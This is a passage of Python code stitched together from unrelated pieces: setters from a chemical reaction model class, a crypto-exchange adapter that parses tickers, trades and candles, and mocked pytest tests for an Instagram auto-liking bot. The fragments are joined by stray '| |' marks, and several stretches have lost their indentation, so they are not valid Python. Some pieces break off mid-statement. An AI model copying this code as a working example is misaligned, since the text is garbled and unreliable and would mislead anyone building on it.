        # Fix: store the validated float instead of the raw argument,
        # consistent with setTemperature.
        self.__ph = ph
    else:
        raise ValueError( "pH out of bounds [0-14]" )
def setName(self, name):
    """Set the reaction name (must be a string)."""
    self.__name = TypeChecker(name, str)

def setReversible(self, reversible):
    """Set the reversibility flag (must be a bool)."""
    self.__reversible = TypeChecker(reversible, bool)

def setId(self, id_):
    """Set the internal ID and derive the meta-ID ("METAID_<ID>") from it."""
    self.__id = TypeChecker(id_, str)
    self.setMetaid("METAID_" + id_.upper())

def setMetaid(self, metaID):
    """Set the meta-identifier (must be a string)."""
    self.__metaid = TypeChecker(metaID, str)

def setModel(self, model):
    """Attach a KineticModel instance to the reaction."""
    self.__model = TypeChecker(model, KineticModel)
def setEducts(self, educts):
if educts == None:
self.__educts = []
else:
self.__educts | |
{
# "instrument_id":"btcusd",
# "last":"9574.5",
# "best_ask":"9575.0",
# "best_bid":"9574.0",
# "high_24h":"9672",
# "low_24h":"9512",
# "volume_24h":"567697050",
# "timestamp":"1595538450096"
# }
#
timestamp = self.safe_integer_2(ticker, 'timestamp', 'id')
symbol = None
marketId = self.safe_string_2(ticker, 'instrument_id', 'symbol')
if marketId in self.markets_by_id:
market = self.markets_by_id[marketId]
symbol = market['symbol']
elif marketId is not None:
parts = marketId.split('_')
numParts = len(parts)
if numParts == 2:
baseId, quoteId = parts
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
else:
symbol = marketId
if (symbol is None) and (market is not None):
symbol = market['symbol']
last = self.safe_number_2(ticker, 'last', 'close')
open = self.safe_number(ticker, 'open')
bidVolume = None
askVolume = None
bid = self.safe_value(ticker, 'bid')
if bid is None:
bid = self.safe_number(ticker, 'best_bid')
else:
bidVolume = self.safe_number(bid, 1)
bid = self.safe_number(bid, 0)
ask = self.safe_value(ticker, 'ask')
if ask is None:
ask = self.safe_number(ticker, 'best_ask')
else:
askVolume = self.safe_number(ask, 1)
ask = self.safe_number(ask, 0)
baseVolume = self.safe_number_2(ticker, 'amount', 'volume_24h')
quoteVolume = self.safe_number(ticker, 'vol')
vwap = self.vwap(baseVolume, quoteVolume)
return self.safe_ticker({
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_number_2(ticker, 'high', 'high_24h'),
'low': self.safe_number_2(ticker, 'low', 'low_24h'),
'bid': bid,
'bidVolume': bidVolume,
'ask': ask,
'askVolume': askVolume,
'vwap': vwap,
'open': open,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': baseVolume,
'quoteVolume': quoteVolume,
'info': ticker,
}, market)
async def fetch_ticker(self, symbol, params={}):
    """
    Fetch the latest ticker for a single market.

    Spot markets go through dataGetMarketDetailMerged, swap markets through
    capiGetMarketTicker; both payloads are normalized by parse_ticker.
    """
    await self.load_markets()
    market = self.market(symbol)
    if market['spot']:
        method = 'dataGetMarketDetailMerged'
    elif market['swap']:
        method = 'capiGetMarketTicker'
    else:
        method = None
    request = {'symbol': market['id']}
    response = await getattr(self, method)(self.extend(request, params))
    #
    # spot
    #
    #     {
    #         "status":"ok",
    #         "ch":"market.eth_btc.detail.merged",
    #         "ts":1595538241474,
    #         "data":{
    #             "id":"1595538241113",
    #             "bid":["0.028474000000","1.139400000000"],
    #             "ask":["0.028482000000","0.353100000000"],
    #             "amount":"2850.6649",
    #             "count":"818",
    #             "open":"0.02821",
    #             "close":"0.028474",
    #             "low":"0.02821",
    #             "high":"0.029091",
    #             "vol":"79.4548693404"
    #         }
    #     }
    #
    # swap
    #
    #     {
    #         "symbol":"btcusd",
    #         "last":"9575.5",
    #         "best_ask":"9576.0",
    #         "best_bid":"9575.0",
    #         "high_24h":"9646",
    #         "low_24h":"9516",
    #         "volume_24h":"516656839",
    #         "timestamp":"1595664217405"
    #     }
    #
    # spot replies wrap the ticker in "data"; swap replies are the ticker itself
    data = self.safe_value(response, 'data', response)
    return self.parse_ticker(data, market)
async def fetch_tickers_by_type(self, type, symbols=None, params={}):
    """
    Fetch tickers for every market of the given type ('spot' or 'swap').

    Spot responses arrive wrapped as {"status", "ts", "data": [...]} with one
    shared timestamp, while swap responses are a bare list; both are folded
    into a symbol-keyed dict and filtered down to the requested symbols.
    """
    await self.load_markets()
    if type == 'spot':
        method = 'dataGetMarketTickers'
    elif type == 'swap':
        method = 'capiGetMarketTickers'
    else:
        method = None
    response = await getattr(self, method)(params)
    #
    # spot
    #
    #     {
    #         "status":"ok",
    #         "ts":1595542893250,
    #         "data":[
    #             {
    #                 "amount":"30086.8095",
    #                 "count":"22450",
    #                 "open":"9525.11",
    #                 "close":"9591.81",
    #                 "low":"9510.68",
    #                 "high":"9659.7",
    #                 "vol":"286239092.250461",
    #                 "symbol":"btc_usdt"
    #             }
    #         ]
    #     }
    #
    # swap
    #
    #     [
    #         {
    #             "symbol":"btcusd",
    #             "last":"9572",
    #             "best_ask":"9571.5",
    #             "best_bid":"9570.5",
    #             "high_24h":"9646",
    #             "low_24h":"9516",
    #             "volume_24h":"515401635",
    #             "timestamp":"1595664479952"
    #         }
    #     ]
    #
    tickers = self.safe_value(response, 'data', response)
    # only the wrapped (spot) reply carries a shared "ts" timestamp
    sharedTimestamp = None
    if not isinstance(response, list):
        sharedTimestamp = self.safe_integer(response, 'ts')
    result = {}
    for entry in tickers:
        ticker = self.parse_ticker(self.extend({
            'timestamp': sharedTimestamp,
        }, entry))
        result[ticker['symbol']] = ticker
    return self.filter_by_array(result, 'symbol', symbols)
async def fetch_tickers(self, symbols=None, params={}):
    """Fetch tickers for the market type given in params or the configured default."""
    fallback = self.safe_string_2(self.options, 'fetchTickers', 'defaultType')
    marketType = self.safe_string(params, 'type', fallback)
    query = self.omit(params, 'type')
    return await self.fetch_tickers_by_type(marketType, symbols, query)
def parse_trade(self, trade, market=None):
    """
    Normalize a raw trade from any public/private endpoint into the unified
    ccxt trade structure.
    """
    #
    # fetchTrades(public)
    #
    #     spot
    #
    #     {
    #         "id":"1",
    #         "price":"9533.81",
    #         "amount":"0.7326",
    #         "direction":"sell",
    #         "ts":"1595604964000"
    #     }
    #
    #     swap
    #
    #     {
    #         "trade_id":"670581881367954915",
    #         "price":"9553.00",
    #         "size":"20",
    #         "side":"sell",
    #         "timestamp":"1595605100004",
    #         "symbol":"btcusd"
    #     }
    #
    # spot fetchMyTrades(private)
    #
    #     {
    #         "id": 29555,
    #         "order_id": 59378,
    #         "match_id": 59335,
    #         "symbol": "eth_usdt",
    #         "type": "buy-limit",
    #         "source": "api",
    #         "price": "100.1000000000",
    #         "filled_amount": "0.9845000000",
    #         "filled_fees": "0.0019690000",
    #         "created_at": 1494901400487
    #     }
    #
    # fetchOrderTrades(private)
    #
    #     spot
    #
    #     {
    #         "id":"614164775",
    #         "created_at":"1596298860602",
    #         "filled_amount":"0.0417000000000000",
    #         "filled_fees":"0.0000834000000000",
    #         "match_id":"673491702661292033",
    #         "order_id":"673491720340279296",
    #         "price":"359.240000000000",
    #         "source":"接口",
    #         "symbol":"eth_usdt",
    #         "type":"buy-market"
    #     }
    #
    #     swap
    #
    #     {
    #         "trade_id":"6667390",
    #         "symbol":"cmt_btcusdt",
    #         "order_id":"525946425993854915",
    #         "price":"9839.00",
    #         "order_qty":"3466",
    #         "fee":"-0.0000528407360000",
    #         "timestamp":"1561121514442",
    #         "exec_type":"M",
    #         "side":"3"
    #     }
    #
    symbol = None
    marketId = self.safe_string(trade, 'symbol')
    base = None
    quote = None
    if marketId in self.markets_by_id:
        market = self.markets_by_id[marketId]
        symbol = market['symbol']
        base = market['base']
        quote = market['quote']
    elif marketId is not None:
        # unknown market id: derive the symbol from the "base_quote" form
        parts = marketId.split('_')
        numParts = len(parts)
        if numParts == 2:
            baseId, quoteId = parts
            base = self.safe_currency_code(baseId)
            quote = self.safe_currency_code(quoteId)
            symbol = base + '/' + quote
        else:
            symbol = marketId.upper()
    if (symbol is None) and (market is not None):
        symbol = market['symbol']
        base = market['base']
        quote = market['quote']
    timestamp = self.safe_integer(trade, 'created_at')
    timestamp = self.safe_integer_2(trade, 'timestamp', 'ts', timestamp)
    priceString = self.safe_string(trade, 'price')
    amountString = self.safe_string_2(trade, 'filled_amount', 'order_qty')
    amountString = self.safe_string_2(trade, 'size', 'amount', amountString)
    takerOrMaker = self.safe_string_2(trade, 'exec_type', 'liquidity')
    if takerOrMaker == 'M':
        takerOrMaker = 'maker'
    elif takerOrMaker == 'T':
        takerOrMaker = 'taker'
    # private endpoints carry the raw side/type in 'type', public ones in
    # 'side'/'direction' - both feed the same two parsers, so the previous
    # duplicated if/else branches are consolidated here
    rawSide = self.safe_string(trade, 'type')
    if rawSide is None:
        rawSide = self.safe_string_2(trade, 'side', 'direction')
    type = self.parse_order_type(rawSide)
    side = self.parse_order_side(rawSide)
    feeCostString = self.safe_string(trade, 'fee')
    if feeCostString is None:
        feeCostString = self.safe_string(trade, 'filled_fees')
    else:
        feeCostString = Precise.string_neg(feeCostString)
    fee = None
    if feeCostString is not None:
        feeCurrency = base if (side == 'buy') else quote
        fee = {
            # fee is either a positive number(invitation rebate)
            # or a negative number(transaction fee deduction)
            # therefore we need to invert the fee
            # more about it https://github.com/ccxt/ccxt/issues/5909
            'cost': feeCostString,
            'currency': feeCurrency,
        }
    orderId = self.safe_string(trade, 'order_id')
    id = self.safe_string_2(trade, 'trade_id', 'id')
    return self.safe_trade({
        'info': trade,
        'timestamp': timestamp,
        'datetime': self.iso8601(timestamp),
        'symbol': symbol,
        'id': id,
        'order': orderId,
        'type': type,
        'takerOrMaker': takerOrMaker,
        'side': side,
        'price': priceString,
        'amount': amountString,
        'cost': None,
        'fee': fee,
    }, market)
async def fetch_trades(self, symbol, limit=None, since=None, params={}):
    """
    Fetch recent public trades for a market.

    NOTE: the non-standard parameter order (limit before since) is kept for
    backward compatibility with existing callers.
    """
    await self.load_markets()
    market = self.market(symbol)
    request = {
        'symbol': market['id'],
    }
    method = None
    # merged the previously duplicated market-type dispatch into one branch
    if market['spot']:
        method = 'dataGetMarketHistoryTrade'
        if limit is not None:
            request['size'] = limit  # default 1, max 2000
    elif market['swap']:
        method = 'capiGetMarketTrades'
        if limit is None:
            limit = 100  # default 20, max 100
        request['limit'] = limit
    response = await getattr(self, method)(self.extend(request, params))
    #
    # spot
    #
    #     {
    #         "status":"ok",
    #         "ch":"market.btc_usdt.trade.detail",
    #         "ts":1595604968430,
    #         "data":{
    #             "ts":"1595604964000",
    #             "data":[
    #                 {"id":"1","price":"9533.81","amount":"0.7326","direction":"sell","ts":"1595604964000"},
    #                 {"id":"2","price":"9533.67","amount":"1.1591","direction":"buy","ts":"1595604961000"},
    #                 {"id":"3","price":"9533.67","amount":"1.5022","direction":"sell","ts":"1595604959000"},
    #             ]
    #         }
    #     }
    #
    # swap
    #
    #     [
    #         {"trade_id":"670833198971748613","price":"9578.50","size":"5412","side":"sell","timestamp":"1595665018790","symbol":"btcusd"},
    #         {"trade_id":"670833194240574915","price":"9579.00","size":"3972","side":"buy","timestamp":"1595665017662","symbol":"btcusd"},
    #         {"trade_id":"670833194240573915","price":"9579.00","size":"1227","side":"buy","timestamp":"1595665017662","symbol":"btcusd"},
    #     ]
    #
    trades = None
    if isinstance(response, list):
        trades = response
    else:
        data = self.safe_value(response, 'data', {})
        # Fix: this used safe_value_2(data, 'data', []), which passes [] as a
        # *second key* rather than as the default value; use safe_value with
        # an explicit [] default instead.
        trades = self.safe_value(data, 'data', [])
    return self.parse_trades(trades, market, since, limit)
def parse_ohlcv(self, ohlcv, market=None, timeframe='1m'):
    """
    Normalize a raw candle into the unified [timestamp, O, H, L, C, V] list.

    Spot candles arrive as dicts keyed by name; swap candles arrive as
    positional lists (see examples below).

    NOTE(review): market['type'] is accessed unconditionally, so despite the
    market=None default a market must actually be supplied - confirm callers.
    """
    #
    # spot
    #
    #     {
    #         "id":"1594694700000",
    #         "amount":"283.6811",
    #         "count":"234",
    #         "open":"9230.00",
    #         "close":"9227.15",
    #         "low":"9206.66",
    #         "high":"9232.33",
    #         "vol":"2618015.032504000000"
    #     }
    #
    # swap
    #
    #     [
    #         "1594693800000",
    #         "9240",
    #         "9241",
    #         "9222",
    #         "9228.5",
    #         "3913370",
    #         "424.003616350563"
    #     ]
    #
    # self.options['parseOHLCV']['volume'] maps market type -> volume key/index
    options = self.safe_value(self.options, 'parseOHLCV', {})
    volume = self.safe_value(options, 'volume', {})
    if isinstance(ohlcv, list):
        # NOTE(review): the fallback here is the string 'amount' while the
        # dict branch below falls back to the integer 6 - presumably the
        # options map always supplies the right value per type; verify.
        volumeIndex = self.safe_string(volume, market['type'], 'amount')
        return [
            self.safe_integer(ohlcv, 0),         # timestamp
            self.safe_number(ohlcv, 1),          # Open
            self.safe_number(ohlcv, 2),          # High
            self.safe_number(ohlcv, 3),          # Low
            self.safe_number(ohlcv, 4),          # Close
            # self.safe_number(ohlcv, 5),        # Quote Volume
            # self.safe_number(ohlcv, 6),        # Base Volume
            self.safe_number(ohlcv, volumeIndex),  # Volume, bitget will return base volume in the 7th element for future markets
        ]
    else:
        volumeIndex = self.safe_value(volume, market['type'], 6)
        return [
            self.safe_integer(ohlcv, 'id'),      # timestamp (spot uses "id")
            self.safe_number(ohlcv, 'open'),     # Open
            self.safe_number(ohlcv, 'high'),     # High
            self.safe_number(ohlcv, 'low'),      # Low
            self.safe_number(ohlcv, 'close'),    # Close
            self.safe_number(ohlcv, volumeIndex),  # Base Volume
        ]
async def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
method = None
type = market['type']
options = self.safe_value(self.options, 'timeframes', {})
intervals = self.safe_value(options, type, {})
interval = self.safe_value(intervals, self.timeframes[timeframe])
if market['spot']:
method = 'dataGetMarketHistoryKline'
request['period'] = interval
if limit is not None:
request['size'] = limit # default 150, max 1000
elif market['swap']:
duration = self.parse_timeframe(timeframe)
method = 'capiGetMarketCandles'
request['granularity'] = interval
now = self.milliseconds()
if since is None:
if limit is None:
limit = 1000
request['start'] = self.iso8601(now - limit * duration * 1000)
request['end'] = self.iso8601(now)
else:
request['start'] = self.iso8601(since)
if | |
json=response_data,
status=200,
)
response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
responses.add(
responses.GET,
"{api_url}users/{user_id}/info/".format(
api_url=API_URL, user_id=TEST_PHOTO_ITEM["user"]["pk"]
),
status=200,
json=response_data,
)
response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
responses.add(
responses.GET,
"{api_url}users/{user_id}/info/".format(
api_url=API_URL, user_id=TEST_PHOTO_ITEM["user"]["pk"]
),
status=200,
json=response_data,
)
responses.add(
responses.POST,
"{api_url}media/{media_id}/like/".format(
api_url=API_URL, media_id=TEST_PHOTO_ITEM["id"]
),
status=200,
json={"status": "ok"},
)
self.bot.like_users(user_ids)
assert self.bot.total["likes"] == results_1
@responses.activate
@pytest.mark.parametrize(
    "blocked_actions_protection,blocked_actions_sleep,result",
    [(True, True, False), (True, False, True),
     (False, True, False), (False, False, False)],
)
@patch("time.sleep", return_value=None)
def test_sleep_feedback_successful(
    self, patched_time_sleep, blocked_actions_protection,
    blocked_actions_sleep, result
):
    """
    First like attempt gets a feedback_required block, the second succeeds.

    The "likes" action should end up marked blocked only when protection is
    on and sleeping-through-blocks is off.
    """
    self.bot.blocked_actions_protection = blocked_actions_protection
    self.bot.blocked_actions_sleep = blocked_actions_sleep
    media_id = 1234567890
    # Instagram's "You're Temporarily Blocked" feedback payload
    response_data = {
        u"status": u"fail",
        u"feedback_title": u"You\u2019re Temporarily Blocked",
        u"feedback_message": u"It looks like you were misusing this " +
        u"feature by going too fast. You\u2019ve been temporarily " +
        u"blocked from using it. We restrict certain content and " +
        u"actions to protect our community. Tell us if you think we " +
        u"made a mistake.",
        u"spam": True,
        u"feedback_action": u"report_problem",
        u"feedback_appeal_label": u"Report problem",
        u"feedback_ignore_label": u"OK",
        u"message": u"feedback_required",
        u"feedback_url": u"repute/report_problem/instagram_like_add/",
    }
    # first like blocked
    responses.add(
        responses.POST,
        "{api_url}media/{media_id}/like/".format(
            api_url=API_URL, media_id=media_id
        ),
        json=response_data,
        status=400,
    )
    # second like successful
    responses.add(
        responses.POST,
        "{api_url}media/{media_id}/like/".format(
            api_url=API_URL, media_id=media_id
        ),
        status=200,
        json={"status": "ok"},
    )
    # do 2 likes
    self.bot.like(media_id, check_media=False)
    self.bot.like(media_id, check_media=False)
    assert self.bot.blocked_actions["likes"] == result
@responses.activate
@pytest.mark.parametrize(
    "blocked_actions_protection,blocked_actions_sleep,result",
    [(True, True, True), (True, False, True),
     (False, True, False), (False, False, False)],
)
@patch("time.sleep", return_value=None)
def test_sleep_feedback_unsuccessful(
    self, patched_time_sleep, blocked_actions_protection,
    blocked_actions_sleep, result
):
    """
    Both like attempts get a feedback_required block.

    With protection on, the "likes" action must be marked blocked
    regardless of the sleep setting.
    """
    self.bot.blocked_actions_protection = blocked_actions_protection
    self.bot.blocked_actions_sleep = blocked_actions_sleep
    media_id = 1234567890
    # Instagram's "You're Temporarily Blocked" feedback payload
    response_data = {
        u"status": u"fail",
        u"feedback_title": u"You\u2019re Temporarily Blocked",
        u"feedback_message": u"It looks like you were misusing this " +
        u"feature by going too fast. You\u2019ve been temporarily " +
        u"blocked from using it. We restrict certain content and " +
        u"actions to protect our community. Tell us if you think we " +
        u"made a mistake.",
        u"spam": True,
        u"feedback_action": u"report_problem",
        u"feedback_appeal_label": u"Report problem",
        u"feedback_ignore_label": u"OK",
        u"message": u"feedback_required",
        u"feedback_url": u"repute/report_problem/instagram_like_add/",
    }
    # both likes blocked
    # Fix: range(1, 2) only registered ONE mocked 400 response even though
    # the comment and the two like() calls below expect two.
    for _ in range(2):
        responses.add(
            responses.POST,
            "{api_url}media/{media_id}/like/".format(
                api_url=API_URL, media_id=media_id
            ),
            json=response_data,
            status=400,
        )
    # do 2 likes
    self.bot.like(media_id, check_media=False)
    self.bot.like(media_id, check_media=False)
    assert self.bot.blocked_actions["likes"] == result
@responses.activate
@pytest.mark.parametrize(
    "blocked_actions_protection,blocked_actions",
    # Fix: the matrix repeated (False, True) and omitted (False, False);
    # sibling tests cover the full 2x2 combination space.
    [(True, True), (True, False), (False, True), (False, False)],
)
@patch("time.sleep", return_value=None)
def test_like_feedback(
    self, patched_time_sleep, blocked_actions_protection, blocked_actions
):
    """
    A feedback_required (HTTP 400) reply must make bot.like() return False
    regardless of the protection/blocked flags.
    """
    self.bot.blocked_actions_protection = blocked_actions_protection
    self.bot.blocked_actions["likes"] = blocked_actions
    media_id = 1234567890
    # Instagram's "You're Temporarily Blocked" feedback payload
    response_data = {
        u"status": u"fail",
        u"feedback_title": u"You\u2019re Temporarily Blocked",
        u"feedback_message": u"It looks like you were misusing this " +
        u"feature by going too fast. You\u2019ve been temporarily " +
        u"blocked from using it. We restrict certain content and " +
        u"actions to protect our community. Tell us if you think we " +
        u"made a mistake.",
        u"spam": True,
        u"feedback_action": u"report_problem",
        u"feedback_appeal_label": u"Report problem",
        u"feedback_ignore_label": u"OK",
        u"message": u"feedback_required",
        u"feedback_url": u"repute/report_problem/instagram_like_add/",
    }
    responses.add(
        responses.POST,
        "{api_url}media/{media_id}/like/".format(
            api_url=API_URL, media_id=media_id
        ),
        json=response_data,
        status=400,
    )
    assert not self.bot.like(media_id, check_media=False)
@responses.activate
@pytest.mark.parametrize("medias", [[1234567890, 9876543210]])
@patch("time.sleep", return_value=None)
def test_like_medias(self, patched_time_sleep, medias):
    """like_medias() should like every media id and report no broken items."""
    self.bot._following = [1]
    # register a media-info endpoint per media id
    # NOTE(review): this mutates the module-level TEST_PHOTO_ITEM fixture
    # ("id" keeps the last media id) - later tests may observe that.
    for media in medias:
        TEST_PHOTO_ITEM["id"] = media
        responses.add(
            responses.GET,
            "{api_url}media/{media_id}/info/".format(
                api_url=API_URL, media_id=media
            ),
            json={
                "auto_load_more_enabled": True,
                "num_results": 1,
                "status": "ok",
                "more_available": False,
                "items": [TEST_PHOTO_ITEM],
            },
            status=200,
        )
    results = 2
    # comments endpoint used by the bot's media checks
    response_data = {
        "caption": TEST_CAPTION_ITEM,
        "caption_is_edited": False,
        "comment_count": 4,
        "comment_likes_enabled": True,
        "comments": [TEST_COMMENT_ITEM for _ in range(results)],
        "has_more_comments": False,
        "has_more_headload_comments": False,
        "media_header_display": "none",
        "preview_comments": [],
        "status": "ok",
    }
    responses.add(
        responses.GET,
        "{api_url}media/{media_id}/comments/?".format(
            api_url=API_URL, media_id=TEST_PHOTO_ITEM["id"]
        ),
        json=response_data,
        status=200,
    )
    # user info is requested twice per flow, hence two registrations
    response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
    responses.add(
        responses.GET,
        "{api_url}users/{user_id}/info/".format(
            api_url=API_URL, user_id=TEST_PHOTO_ITEM["user"]["pk"]
        ),
        status=200,
        json=response_data,
    )
    response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
    responses.add(
        responses.GET,
        "{api_url}users/{user_id}/info/".format(
            api_url=API_URL, user_id=TEST_PHOTO_ITEM["user"]["pk"]
        ),
        status=200,
        json=response_data,
    )
    # the like endpoint itself
    responses.add(
        responses.POST,
        "{api_url}media/{media_id}/like/".format(
            api_url=API_URL, media_id=TEST_PHOTO_ITEM["id"]
        ),
        status=200,
        json={"status": "ok"},
    )
    broken_items = self.bot.like_medias(medias)
    assert [] == broken_items
@responses.activate
@pytest.mark.parametrize("hashtag", ["like_hashtag1", "like_hashtag2"])
@patch("time.sleep", return_value=None)
def test_like_hashtag(self, patche_time_sleep, hashtag):
    """
    like_hashtag() should like all medias of the hashtag feed's first page
    and increase the like counter accordingly.
    """
    self.bot._following = [1]
    liked_at_start = self.bot.total["likes"]
    results_1 = 10
    # fixture media tuned so it passes the bot's like filters
    my_test_photo_item = TEST_PHOTO_ITEM.copy()
    my_test_photo_item["like_count"] = self.bot.min_likes_to_like + 1
    my_test_photo_item["has_liked"] = False
    # hashtag feed page with results_1 copies of the fixture media
    response_data = {
        "auto_load_more_enabled": True,
        "num_results": results_1,
        "status": "ok",
        "more_available": True,
        "next_max_id": my_test_photo_item["id"],
        "items": [my_test_photo_item for _ in range(results_1)],
    }
    responses.add(
        responses.GET,
        (
            "{api_url}feed/tag/{hashtag}/?max_id={max_id}" +
            "&rank_token={rank_token}&ranked_content=true&"
        ).format(
            api_url=API_URL,
            hashtag=hashtag,
            max_id="",
            rank_token=self.bot.api.rank_token,
        ),
        json=response_data,
        status=200,
    )
    # hashtag search metadata endpoint
    response_tag = {
        "results": [
            {
                "id": 17841563287125205,
                "name": hashtag,
                "media_count": 7645915,
                "follow_status": None,
                "following": None,
                "allow_following": None,
                "allow_muting_story": None,
                "profile_pic_url": "https://instagram.fmxp6-1.fna.fbcdn." +
                "net/vp/8e512ee62d218765d3ac46f3da6869de/5E0E0DE3/t51.28" +
                "85-15/e35/c148.0.889.889a/s150x150/67618693_24674373801" +
                "56007_7054420538339677194_n.jpg?_nc_ht=instagram.fmxp6-" +
                "1.fna.fbcdn.net&ig_cache_key=<KEY>" +
                "%3D%3D.2.c",
                "non_violating": None,
                "related_tags": None,
                "subtitle": None,
                "social_context": None,
                "social_context_profile_links": None,
                "follow_button_text": None,
                "show_follow_drop_down": None,
                "formatted_media_count": "7.6M",
                "debug_info": None,
                "search_result_subtitle": "7.6M posts",
            }
        ]
    }
    responses.add(
        responses.GET,
        (
            "{api_url}tags/search/?is_typeahead=true&q={query}" +
            "&rank_token={rank_token}"
        ).format(
            api_url=API_URL,
            query=hashtag,
            rank_token=self.bot.api.rank_token
        ),
        json=response_tag,
        status=200,
    )
    # single media info endpoint
    responses.add(
        responses.GET,
        "{api_url}media/{media_id}/info/".format(
            api_url=API_URL, media_id=my_test_photo_item["id"]
        ),
        json={
            "auto_load_more_enabled": True,
            "num_results": 1,
            "status": "ok",
            "more_available": False,
            "items": [my_test_photo_item],
        },
        status=200,
    )
    results_2 = 2
    # comments endpoint used by the bot's media checks; the id matches
    # my_test_photo_item since that is an unmodified copy
    response_data = {
        "caption": TEST_CAPTION_ITEM,
        "caption_is_edited": False,
        "comment_count": results_2,
        "comment_likes_enabled": True,
        "comments": [TEST_COMMENT_ITEM for _ in range(results_2)],
        "has_more_comments": False,
        "has_more_headload_comments": False,
        "media_header_display": "none",
        "preview_comments": [],
        "status": "ok",
    }
    responses.add(
        responses.GET,
        "{api_url}media/{media_id}/comments/?".format(
            api_url=API_URL, media_id=TEST_PHOTO_ITEM["id"]
        ),
        json=response_data,
        status=200,
    )
    # user info is requested twice per flow, hence two registrations
    response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
    responses.add(
        responses.GET,
        "{api_url}users/{user_id}/info/".format(
            api_url=API_URL, user_id=my_test_photo_item["user"]["pk"]
        ),
        status=200,
        json=response_data,
    )
    response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
    responses.add(
        responses.GET,
        "{api_url}users/{user_id}/info/".format(
            api_url=API_URL, user_id=my_test_photo_item["user"]["pk"]
        ),
        status=200,
        json=response_data,
    )
    # the like endpoint itself
    responses.add(
        responses.POST,
        "{api_url}media/{media_id}/like/".format(
            api_url=API_URL, media_id=my_test_photo_item["id"]
        ),
        status=200,
        json={"status": "ok"},
    )
    broken_items = self.bot.like_hashtag(hashtag)
    assert [] == broken_items
    assert self.bot.total["likes"] == liked_at_start + results_1
@responses.activate
@pytest.mark.parametrize("username", ["1234567890", 1234567890])
@patch("time.sleep", return_value=None)
def test_like_followers(self, patched_time_sleep, username):
    """
    like_followers() should like every feed media of every follower:
    results_3 followers x results_4 medias each.
    """
    liked_at_start = self.bot.total["likes"]
    test_username = "test.username"
    # username -> user-id resolution for the target account
    response_data_1 = {"status": "ok", "user": TEST_SEARCH_USERNAME_ITEM}
    responses.add(
        responses.GET,
        "{api_url}users/{username}/usernameinfo/".format(
            api_url=API_URL, username=test_username
        ),
        status=200,
        json=response_data_1,
    )
    response_data_2 = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
    responses.add(
        responses.GET,
        "{api_url}users/{user_id}/info/".format(
            api_url=API_URL,
            user_id=username
        ),
        status=200,
        json=response_data_2,
    )
    # follower list with results_3 entries
    results_3 = 2
    response_data_3 = {
        "status": "ok",
        "big_list": False,
        "next_max_id": None,
        "sections": None,
        "users": [TEST_FOLLOWER_ITEM for _ in range(results_3)],
    }
    responses.add(
        responses.GET,
        (
            "{api_url}friendships/{user_id}/followers/" +
            "?rank_token={rank_token}"
        ).format(
            api_url=API_URL,
            user_id=username,
            rank_token=self.bot.api.rank_token
        ),
        json=response_data_3,
        status=200,
    )
    self.bot._following = [1]
    # NOTE(review): mutates the module-level fixture so the bot's filters
    # accept the user; later tests may observe this change.
    TEST_USERNAME_INFO_ITEM["biography"] = "instabot"
    # fixture media tuned so it passes the bot's like filters
    my_test_photo_item = TEST_PHOTO_ITEM.copy()
    my_test_photo_item["like_count"] = self.bot.min_likes_to_like + 1
    my_test_photo_item["has_liked"] = False
    response_data = {"status": "ok", "user": TEST_SEARCH_USERNAME_ITEM}
    responses.add(
        responses.GET,
        "{api_url}users/{username}/usernameinfo/".format(
            api_url=API_URL, username=username
        ),
        status=200,
        json=response_data,
    )
    # user info is requested twice per flow, hence two registrations
    response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
    responses.add(
        responses.GET,
        "{api_url}users/{user_id}/info/".format(
            api_url=API_URL,
            user_id=username
        ),
        status=200,
        json=response_data,
    )
    response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
    responses.add(
        responses.GET,
        "{api_url}users/{user_id}/info/".format(
            api_url=API_URL,
            user_id=username
        ),
        status=200,
        json=response_data,
    )
    # user feed with results_4 medias
    results_4 = 3
    response_data = {
        "auto_load_more_enabled": True,
        "num_results": results_4,
        "status": "ok",
        "more_available": False,
        "items": [my_test_photo_item for _ in range(results_4)],
    }
    responses.add(
        responses.GET,
        (
            "{api_url}feed/user/{user_id}/?max_id={max_id}&min_timestamp" +
            "={min_timestamp}&rank_token={rank_token}&ranked_content=true"
        ).format(
            api_url=API_URL,
            user_id=username,
            max_id="",
            min_timestamp=None,
            rank_token=self.bot.api.rank_token,
        ),
        json=response_data,
        status=200,
    )
    # single media info endpoint
    responses.add(
        responses.GET,
        "{api_url}media/{media_id}/info/".format(
            api_url=API_URL, media_id=my_test_photo_item["id"]
        ),
        json={
            "auto_load_more_enabled": True,
            "num_results": 1,
            "status": "ok",
            "more_available": False,
            "items": [my_test_photo_item],
        },
        status=200,
    )
    results_5 = 2
    # comments endpoint used by the bot's media checks
    response_data = {
        "caption": TEST_CAPTION_ITEM,
        "caption_is_edited": False,
        "comment_count": results_5,
        "comment_likes_enabled": True,
        "comments": [TEST_COMMENT_ITEM for _ in range(results_5)],
        "has_more_comments": False,
        "has_more_headload_comments": False,
        "media_header_display": "none",
        "preview_comments": [],
        "status": "ok",
    }
    responses.add(
        responses.GET,
        "{api_url}media/{media_id}/comments/?".format(
            api_url=API_URL, media_id=my_test_photo_item["id"]
        ),
        json=response_data,
        status=200,
    )
    # media-owner info, again registered twice
    response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
    responses.add(
        responses.GET,
        "{api_url}users/{user_id}/info/".format(
            api_url=API_URL, user_id=my_test_photo_item["user"]["pk"]
        ),
        status=200,
        json=response_data,
    )
    response_data = {"status": "ok", "user": TEST_USERNAME_INFO_ITEM}
    responses.add(
        responses.GET,
        "{api_url}users/{user_id}/info/".format(
            api_url=API_URL, user_id=my_test_photo_item["user"]["pk"]
        ),
        status=200,
        json=response_data,
    )
